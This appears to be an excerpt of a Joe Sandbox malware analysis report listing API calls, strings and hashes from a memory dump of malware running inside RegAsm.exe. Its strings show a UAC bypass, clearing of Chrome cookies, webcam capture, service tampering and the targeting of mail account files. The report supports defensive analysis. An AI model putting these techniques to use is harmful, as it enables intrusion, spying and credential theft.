                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                          • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                                          • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                          • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                                          APIs
                                                          • CoInitializeEx.OLE32(00000000,00000002), ref: 004075D0
                                                            • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                                            • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                          • CoUninitialize.OLE32 ref: 00407629
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeObjectUninitialize_wcslen
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                          • API String ID: 3851391207-1839356972
                                                          • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                          • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                                          • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                          • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                                          APIs
                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                                          • GetLastError.KERNEL32 ref: 0040BAE7
                                                          Strings
                                                          • UserProfile, xrefs: 0040BAAD
                                                          • [Chrome Cookies not found], xrefs: 0040BB01
                                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                                          • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteErrorFileLast
                                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                          • API String ID: 2018770650-304995407
                                                          • Opcode ID: ad6ae7ff657ff4a30210cd1c10e5c69c8194eac217f6538686f2b1907c56e876
                                                          • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                                          • Opcode Fuzzy Hash: ad6ae7ff657ff4a30210cd1c10e5c69c8194eac217f6538686f2b1907c56e876
                                                          • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                                          APIs
                                                          • __allrem.LIBCMT ref: 0043AC69
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                                          • __allrem.LIBCMT ref: 0043AC9C
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                                          • __allrem.LIBCMT ref: 0043ACD1
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1992179935-0
                                                          • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                          • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                                          • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                          • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                                          APIs
                                                          • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                                            • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prologSleep
                                                          • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                          • API String ID: 3469354165-3054508432
                                                          • Opcode ID: 3ed1f883daae910b3ef5abeda90b7d47a2f3df688b18fa09c78226e6713a338e
                                                          • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                                          • Opcode Fuzzy Hash: 3ed1f883daae910b3ef5abeda90b7d47a2f3df688b18fa09c78226e6713a338e
                                                          • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __cftoe
                                                          • String ID:
                                                          • API String ID: 4189289331-0
                                                          • Opcode ID: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                                                          • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                                          • Opcode Fuzzy Hash: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                                                          • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                                          APIs
                                                          • _strlen.LIBCMT ref: 10001607
                                                          • _strcat.LIBCMT ref: 1000161D
                                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                          • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                          • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: lstrcatlstrlen$_strcat_strlen
                                                          • String ID:
                                                          • API String ID: 1922816806-0
                                                          • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                          • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                          • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                          • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$AttributesFilelstrcat
                                                          • String ID:
                                                          • API String ID: 3594823470-0
                                                          • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                          • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                          • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                          • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                          • String ID:
                                                          • API String ID: 493672254-0
                                                          • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                                          • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                                          • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                                          • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                          • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                          • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                          • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                          • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                          • _free.LIBCMT ref: 10005B2D
                                                          • _free.LIBCMT ref: 10005B55
                                                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                          • _abort.LIBCMT ref: 10005B74
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_free$_abort
                                                          • String ID:
                                                          • API String ID: 3160817290-0
                                                          • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                          • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                          • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                          • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                          APIs
                                                          • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • _free.LIBCMT ref: 0044824C
                                                          • _free.LIBCMT ref: 00448274
                                                          • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                          • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • _abort.LIBCMT ref: 00448293
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free$_abort
                                                          • String ID:
                                                          • API String ID: 3160817290-0
                                                          • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                          • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                                          • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                          • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                                          • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                                          • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                                          • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                                          • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                                          • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                                          • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                                          • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                                          • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                                          • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443475
                                                          • _free.LIBCMT ref: 00443540
                                                          • _free.LIBCMT ref: 0044354A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$FileModuleName
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$P0W
                                                          • API String ID: 2506810119-1250032479
                                                          • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                          • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                                          • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                          • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                                          APIs
                                                            • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32 ref: 0041363D
                                                            • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                                            • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                                            • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                            • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                          • _wcslen.LIBCMT ref: 0041B763
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                          • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                                          • API String ID: 3286818993-4246244872
                                                          • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                                          • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                                          • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                                          • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                                          APIs
                                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                          • API String ID: 4036392271-1520055953
                                                          • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                          • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                          • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                          • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: pB\
                                                          • API String ID: 0-186810650
                                                          • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
